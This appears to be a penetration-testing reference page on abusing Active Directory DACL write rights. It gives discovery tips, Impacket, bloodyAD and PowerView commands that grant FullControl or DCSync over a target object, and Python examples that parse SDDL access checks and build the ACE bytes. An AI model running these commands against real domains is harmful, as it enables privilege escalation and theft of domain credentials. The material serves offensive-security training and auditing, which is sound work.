👾 Overview
In AD every object has a Discretionary Access Control List (DACL), stored in its nTSecurityDescriptor attribute, that defines which principals have which permissions over the object. Each entry in a DACL is an Access Control Entry (ACE): it names a trustee (a user, group or computer SID), an access mask, and whether the entry allows or denies those rights. By default the principal that creates an object becomes its owner, and the owner of an object always holds the right to rewrite its DACL (WRITE_DAC), regardless of what the DACL itself says.
If we can modify a target object's DACL we can compromise that object by adding an ACE that grants a principal we control whatever right we want, e.g. FullControl (GenericAll). This can be used to compromise users, groups, computers, GPOs, OUs and the domain object itself (by granting DCSync).
🔍 Discovery
To exploit this we need a right on the target object that lets us rewrite its DACL. The following provide that:
WriteDACL (WRITE_DAC): the direct right to rewrite the DACL.
GenericAll: includes WRITE_DAC along with every other right on the object.
WriteOwner (WRITE_OWNER): does not let us edit the DACL directly, but lets us first take ownership of the object, and the owner always holds WRITE_DAC.
Note that GenericWrite does not include WriteDACL: it allows writing the object's attributes (which has its own abuse paths) but cannot be used to rewrite the DACL.
The easiest way to enumerate these rights is BloodHound (the WriteDacl, GenericAll, WriteOwner and Owns edges), but PowerView (Get-DomainObjectAcl, Find-InterestingDomainAcl) or similar tools also work. Remember that rights are evaluated against the whole token, so a right held by a group the user belongs to counts as well.
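The enumeration tools above answer one question per object: who, given the ordered ACEs and the owner, can end up rewriting the DACL? The following is an added example (not code from the original page or from any of the tools it names) that implements that check over the DACL in SDDL form, the text format PowerShell and ADSI expose security descriptors in. It expands the generic rights with the directory-object generic mapping, which is exactly what shows GenericWrite does not carry WRITE_DAC, honours deny ACEs in order the way the Windows access check does, and gives the owner its implicit WRITE_DAC. The SDDL string, the SIDs in it and the RIDs 1105 to 1107 are constructed for the example, not taken from a real domain.

```python
import re

# SDDL right abbreviations -> ACCESS_MASK bits (from the SDDL specification).
SDDL_RIGHTS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "WO": 0x00080000, "WD": 0x00040000, "RC": 0x00020000, "SD": 0x00010000,
    "CC": 0x001, "DC": 0x002, "LC": 0x004, "SW": 0x008, "RP": 0x010,
    "WP": 0x020, "DT": 0x040, "LO": 0x080, "CR": 0x100,
}
WRITE_DAC, WRITE_OWNER, READ_CONTROL = 0x40000, 0x80000, 0x20000

# Generic -> specific mapping for directory objects. GENERIC_WRITE expands to
# READ_CONTROL | WP | SW only: no WRITE_DAC, so GenericWrite cannot rewrite a DACL.
DS_GENERIC_MAPPING = {
    0x10000000: 0x000F01FF,  # GENERIC_ALL
    0x80000000: 0x00020094,  # GENERIC_READ
    0x40000000: 0x00020028,  # GENERIC_WRITE
    0x20000000: 0x00020004,  # GENERIC_EXECUTE
}


def rights_mask(rights):
    """Turn an SDDL rights field ('GA', 'RPLCLORC', '0x40000') into specific rights."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
    else:
        mask = 0
        for i in range(0, len(rights), 2):
            mask |= SDDL_RIGHTS[rights[i:i + 2]]
    for generic, specific in DS_GENERIC_MAPPING.items():
        if mask & generic:
            mask = (mask & ~generic) | specific
    return mask


def parse_sddl(sddl):
    """Return (owner, aces); aces is [(is_deny, mask, trustee), ...] in DACL order.
    Object ACEs (OA/OD) are kept but their GUIDs ignored: WD/WO/GA are never object-scoped."""
    owner_m = re.search(r"O:(.*?)(?=G:|D:|S:|$)", sddl)
    owner = owner_m.group(1) if owner_m else None
    dacl_m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl_m.group(1) if dacl_m else ""):
        fields = body.split(";")  # type;flags;rights;object_guid;inherit_guid;trustee
        aces.append((fields[0] in ("D", "OD"), rights_mask(fields[2]), fields[5]))
    return owner, aces


def access_check(aces, token_sids, desired, owner=None):
    """Windows-style check: walk ACEs in order; a matching deny on a still-needed bit
    fails, matching allows clear bits; the owner implicitly holds READ_CONTROL|WRITE_DAC."""
    remaining = desired
    if owner is not None and owner in token_sids:
        remaining &= ~(READ_CONTROL | WRITE_DAC)
    for is_deny, mask, trustee in aces:
        if remaining == 0:
            break
        if trustee not in token_sids:
            continue
        if is_deny and (mask & remaining):
            return False
        if not is_deny:
            remaining &= ~mask
    return remaining == 0


def can_modify_dacl(sddl, token_sids):
    owner, aces = parse_sddl(sddl)
    return access_check(aces, set(token_sids), WRITE_DAC, owner)


def can_take_ownership(sddl, token_sids):
    owner, aces = parse_sddl(sddl)
    return access_check(aces, set(token_sids), WRITE_OWNER, owner)


def dacl_takeover_candidates(sddl):
    """Map every trustee that can end up rewriting the DACL to the path it would use."""
    owner, aces = parse_sddl(sddl)
    trustees = dict.fromkeys(([owner] if owner else []) + [t for _, _, t in aces])
    result = {}
    for t in trustees:
        if access_check(aces, {t}, WRITE_DAC, owner):
            result[t] = "WriteDACL"
        elif access_check(aces, {t}, WRITE_OWNER, owner):
            result[t] = "WriteOwner"
    return result


# Constructed sample (not from a real domain): owner is RID 512, RID 1105 holds
# WriteDACL, RID 1106 holds only GenericWrite and is explicitly denied WriteDACL,
# RID 1107 holds WriteOwner, Authenticated Users can only read.
SAMPLE_SDDL = (
    "O:S-1-5-21-1-2-3-512"
    "D:(D;;WD;;;S-1-5-21-1-2-3-1106)"
    "(A;;GA;;;SY)"
    "(A;;GA;;;S-1-5-21-1-2-3-512)"
    "(A;;WD;;;S-1-5-21-1-2-3-1105)"
    "(A;;GW;;;S-1-5-21-1-2-3-1106)"
    "(A;;WO;;;S-1-5-21-1-2-3-1107)"
    "(A;;RPLCLORC;;;AU)"
)

if __name__ == "__main__":
    for trustee, path in dacl_takeover_candidates(SAMPLE_SDDL).items():
        print(trustee, "->", path)
```

For a real check pass the user's SID together with the SIDs of every group in their token as `token_sids`; the per-trustee view from `dacl_takeover_candidates` is what the BloodHound edges summarise, and RID 1106 in the sample is the reminder that GenericWrite alone never appears in it.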
📌 Exploitation
This can be exploited against users, groups, computers, GPOs, OUs and the domain object, from either Windows or Linux. In the commands below, [USER] is the principal we control and are granting rights to, [TARGET] is the object whose DACL we can modify, and [USERNAME]/[PASSWORD] is the account we authenticate with (often the same as [USER]).
Linux
# Using Impacket to grant FullControl against a user, computer, group, GPO or OU
# -inheritance only matters for container targets (OU, domain): it makes the new ACE apply to child objects
impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal '[USER]' -target-dn '[TARGET DN]' '[DOMAIN]'/'[USERNAME]':'[PASSWORD]'
# Using Impacket to grant DCSync against the domain object (target the domain DN itself, e.g. DC=[DOMAIN],DC=[TLD])
dacledit.py -action 'write' -rights 'DCSync' -principal '[USER]' -target-dn '[DOMAIN DN]' '[DOMAIN]'/'[USERNAME]':'[PASSWORD]'
# Read the DACL back, filtered to [USER], to confirm the new ACE is present
dacledit.py -action 'read' -principal '[USER]' -target-dn '[TARGET DN]' '[DOMAIN]'/'[USERNAME]':'[PASSWORD]'
# Using BloodyAD to grant FullControl against a user, computer, group, GPO or OU
# [DC] is the domain controller to talk to; the target comes first, then the trustee receiving the right
bloodyAD --host [DC] -d [DOMAIN] -u [USERNAME] -p [PASSWORD] add genericAll [TARGET] [USER]
# Using BloodyAD to grant DCSync against the domain (the trustee argument is required)
bloodyAD --host [DC] -d [DOMAIN] -u [USERNAME] -p [PASSWORD] add dcsync [USER]
Windows
# Using PowerView to grant FullControl against a user, computer, group, GPO or OU
Add-DomainObjectAcl -TargetIdentity "[TARGET]" -PrincipalIdentity "[USER]" -Rights All
# Using PowerView to grant DCSync against the domain object (-Rights also accepts ResetPassword and WriteMembers for narrower grants)
Add-DomainObjectAcl -TargetIdentity "[DOMAIN DN]" -PrincipalIdentity "[USER]" -Rights DCSync
# Confirm the ACE for [USER] landed on the target
Get-DomainObjectAcl -Identity "[TARGET]" -ResolveGUIDs | Where-Object { $_.SecurityIdentifier.Value -eq (Get-DomainUser "[USER]").objectsid }
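All of the commands above do the same thing under the hood: read the target's nTSecurityDescriptor, append one or more ACEs for the chosen trustee to the DACL, and write the descriptor back. The following is an added example (not code from the original page, Impacket, bloodyAD or PowerView) that builds those ACEs in their binary form so the wire format is concrete: an ACCESS_ALLOWED_ACE carrying GENERIC_ALL for FullControl, and for DCSync the three ACCESS_ALLOWED_OBJECT_ACEs that scope the control-access right to the replication extended rights. It does not talk to a domain controller; the SID is constructed for the example, and the `parse_ace` helper is only there to show the bytes decode back to what was intended.

```python
import struct
import uuid

ACCESS_ALLOWED_ACE_TYPE = 0x00
ACCESS_ALLOWED_OBJECT_ACE_TYPE = 0x05
ACE_OBJECT_TYPE_PRESENT = 0x00000001
ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x00000002
CONTAINER_INHERIT_ACE = 0x02       # ACE flag: an ACE on an OU also applies to objects beneath it
GENERIC_ALL = 0x10000000
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100  # "extended right" bit, scoped by the ACE's object GUID

# The extended rights that together make up "DCSync" on the domain head.
DCSYNC_RIGHTS = {
    "DS-Replication-Get-Changes": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "DS-Replication-Get-Changes-All": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "DS-Replication-Get-Changes-In-Filtered-Set": "89e95b76-444d-4c62-991a-0facbeda640c",
}


def sid_to_bytes(sid):
    """S-1-<authority>-<sub>... -> revision, count, 6-byte big-endian authority, LE subauthorities."""
    parts = sid.split("-")
    assert parts[0] == "S" and parts[1] == "1"
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data):
    rev, count = data[0], data[1]
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack("<%dI" % count, data[8:8 + 4 * count])
    return "S-%d-%d-" % (rev, authority) + "-".join(str(s) for s in subs)


def ace_header(ace_type, flags, body_len):
    # ACE_HEADER: AceType, AceFlags, AceSize (size includes the 4-byte header)
    return struct.pack("<BBH", ace_type, flags, 4 + body_len)


def full_control_ace(trustee_sid, inherit=False):
    """ACCESS_ALLOWED_ACE granting GENERIC_ALL to the trustee (what 'FullControl' writes)."""
    body = struct.pack("<I", GENERIC_ALL) + sid_to_bytes(trustee_sid)
    flags = CONTAINER_INHERIT_ACE if inherit else 0
    return ace_header(ACCESS_ALLOWED_ACE_TYPE, flags, len(body)) + body


def dcsync_aces(trustee_sid):
    """Three ACCESS_ALLOWED_OBJECT_ACEs: control access, each scoped to one replication right."""
    out = []
    for guid in DCSYNC_RIGHTS.values():
        body = (struct.pack("<II", ADS_RIGHT_DS_CONTROL_ACCESS, ACE_OBJECT_TYPE_PRESENT)
                + uuid.UUID(guid).bytes_le + sid_to_bytes(trustee_sid))
        out.append(ace_header(ACCESS_ALLOWED_OBJECT_ACE_TYPE, 0, len(body)) + body)
    return out


def parse_ace(ace):
    """Decode an allow ACE (plain or object) back into its fields."""
    ace_type, flags, size = struct.unpack("<BBH", ace[:4])
    assert size == len(ace)
    mask = struct.unpack("<I", ace[4:8])[0]
    pos, obj = 8, None
    if ace_type == ACCESS_ALLOWED_OBJECT_ACE_TYPE:
        obj_flags = struct.unpack("<I", ace[8:12])[0]
        pos = 12
        if obj_flags & ACE_OBJECT_TYPE_PRESENT:
            obj = str(uuid.UUID(bytes_le=ace[pos:pos + 16]))
            pos += 16
        if obj_flags & ACE_INHERITED_OBJECT_TYPE_PRESENT:
            pos += 16
    return {"type": ace_type, "flags": flags, "mask": mask,
            "object_type": obj, "sid": bytes_to_sid(ace[pos:])}


if __name__ == "__main__":
    trustee = "S-1-5-21-1-2-3-1105"  # constructed SID for the example
    print(full_control_ace(trustee, inherit=True).hex())
    for ace in dcsync_aces(trustee):
        print(parse_ace(ace))
```

The point of the two builders is the difference the exploitation commands hide: FullControl is one ACE with a plain access mask, while DCSync is nothing but control-access entries whose meaning lives in the object GUID, which is why tools that read DACLs have to resolve GUIDs before the entry looks like anything to a human.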
📝 Resources
| 🔗 Hyperlink | ℹ️ Info |
|---|---|
| Microsoft Learn | DACLs and ACEs |
| Tenable | Write DACL |
| SpecterOps | Write DACL |